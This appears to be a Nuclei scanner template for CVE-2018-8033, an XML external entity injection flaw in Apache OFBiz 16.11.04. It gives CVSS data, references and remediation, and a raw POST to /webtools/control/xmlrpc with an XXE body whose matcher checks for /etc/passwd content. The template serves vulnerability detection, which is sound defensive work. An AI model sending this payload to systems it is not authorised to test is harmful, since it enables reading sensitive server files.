id: CVE-2018-8033 info: name: Apache OFBiz 16.11.04 - XML Entity Injection author: pikpikcu severity: high description: | Apache OFBiz 16.11.04 is susceptible to XML external entity injection (XXE injection). impact: | Successful exploitation of this vulnerability could lead to information disclosure, denial of service. remediation: | Apply the necessary patches or upgrade to a non-vulnerable version of Apache OFBiz. reference: - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2018-8033 - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777%40%3Cuser.ofbiz.apache.org%3E classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-8033 cwe-id: CWE-200 epss-score: 0.00813 epss-percentile: 0.79886 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: ofbiz tags: cve,cve2018,apache,ofbiz,xxe http: - raw: - | POST /webtools/control/xmlrpc HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Language: en Content-Type: application/xml ]>&disclose; matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a0047304502203a0044ab25795c7c75ba9c4819507fdcc92289c32bfaa9c1342e3c6c56db1956022100e4158665971deb43376ce9ec7ac7fa795c820eb2a080bff590f3fba6e7f00769:922c64590222798bb761d5b6d8e72950